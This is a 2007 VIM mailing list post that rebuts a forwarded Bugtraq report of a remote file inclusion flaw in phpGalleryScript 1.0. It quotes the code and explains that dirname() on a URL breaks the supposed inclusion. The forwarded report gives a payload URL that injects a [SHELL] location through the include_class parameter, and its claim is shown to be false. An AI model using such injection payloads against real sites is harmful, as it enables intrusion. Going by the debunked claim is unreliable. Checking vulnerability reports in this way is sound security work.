[VIM] false: phpGalleryScript 1.0 - File Inclusion Vulnerabilities

str0ke str0ke at milw0rm.com
Tue Apr 10 19:44:05 UTC 2007


init.gallery.php
#######################3

$inc_path = dirname($include_class);
require ($inc_path."/class.gallery.php");
include($inc_path."/config.gallery.php");
....
#######################3

dirname("http://milw0rm.com") == http:

/str0ke

---------- Forwarded message ----------
From: z12xxa at gmail.com <z12xxa at gmail.com>
Date: 9 Apr 2007 23:19:32 -0000
Subject: phpGalleryScript 1.0 - File Inclusion Vulnerabilities
To: bugtraq at securityfocus.com


vendor url: http://tomex.org/

http://[victim]/php/init.gallery.php?include_class=[SHELL]


More information about the VIM mailing list